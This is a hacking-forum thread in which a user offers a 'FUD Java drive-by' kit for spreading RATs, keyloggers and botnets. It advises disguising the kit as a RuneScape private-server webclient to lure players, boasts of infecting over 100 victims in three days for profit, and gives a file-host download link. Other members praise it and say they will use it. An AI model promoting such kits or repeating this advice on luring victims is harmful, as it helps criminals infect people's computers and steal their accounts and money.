• Welcome to ForumKorner!
    Join today and become a part of the community.

FUD Java Drive By -- Great way to spread your virus!

The Joker

Onyx user!
First off, I'm going to explain to you what a java drive by is, if you don't already know.

Code:
Download of spyware, a computer virus or any kind of malware that happens without knowledge of the user. Drive-by downloads may happen by visiting a website, viewing an e-mail message or by clicking on a deceptive popup window: the user clicks on the window in the mistaken belief that, for instance, it is an error report from his own PC or that it is an innocuous advertisement popup; in such cases, the “supplier” may claim that the user “consented” to the download though he was completely unaware of having initiated a malicious software download

Now, you may ask, how can I use this to get victims to my RAT/keylogger/botnet, or whatever you may use this for. But, if you are using this to infect Runescape players, I suggest using this as a " RSPS Webclient ". I used to use this to get my RATs, and I've had over 100 RATs in 3 days. Making me well over 2bil in a weeks time.

I'm always welcome to help you newer herders set this up. Its only 2 files. I suggest downloading notepad++ to edit the index.html file. Do not worry about the .jar file.. its only there to make the applet run.

Code:
http://www.mediafire.com/?24e3vj6qeycbzfd

Singed

Onyx user!
Very nice setup! :p
I find that this is the most effective way of using a JDB when attempting to gain some decent money and it definitely will aid you if you have a somewhat common knowledge with how runescape private servers operate in order to make it look more convincing if you really wanna overdo it :wink:
Good work though buddy, keep it up! :3

The Joker

Onyx user!
singed said:
Very nice setup! :p
I find that this is the most effective way of using a JDB when attempting to gain some decent money and it definitely will aid you if you have a somewhat common knowledge with how runescape private servers operate in order to make it look more convincing if you really wanna overdo it :wink:
Good work though buddy, keep it up! :3

Just helpin out.

ImSoPro

Onyx user!
Thanks bro, will use it for sure!

The Joker

Onyx user!